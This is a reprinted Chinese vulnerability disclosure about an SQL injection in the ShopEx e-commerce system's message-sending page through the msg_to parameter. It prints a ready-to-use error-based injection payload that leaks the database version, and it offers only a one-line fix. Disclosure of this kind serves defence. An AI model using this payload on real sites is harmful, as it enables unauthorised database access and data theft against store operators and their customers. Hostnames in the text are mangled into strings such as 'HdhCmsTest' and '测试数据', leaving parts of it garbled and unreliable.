好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

SHOPEX > 4 存在SQL注入漏洞及修复方案 - 网站安全

未对客户端可控参数进行安全校验,导致存在SQL注入 漏洞 ;

详细说明:

http://HdhCmsTestshopex测试数据/member-sendMsg.html

在处理用户发送信息的时候,msg_to值未进行过滤,导致SQL注入漏洞的产生;

 

具体利用设置msg_to的值为

 

ggbond' or 1=(select 1 from (select count(*),concat(floor(rand(0)*2),(select @@version))a from information_schema.tables group by a)b)#

 

 

即可爆出HdhCmsTest2cto测试数据 数据库 版本信息。

 

找不到你填写的用户!

 

 

修复方案:

过滤,校验,转义来自客户端的变量;

你们比我更擅长;

查看更多关于SHOPEX > 4 存在SQL注入漏洞及修复方案 - 网站安全的详细内容...

声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did13500
  阅读:50次

上一篇: 当盲打输入框遇到XSS,当XSS遇到会话过期,当会

下一篇:优酷子站无验证码致可暴力破解账户 - 网站安全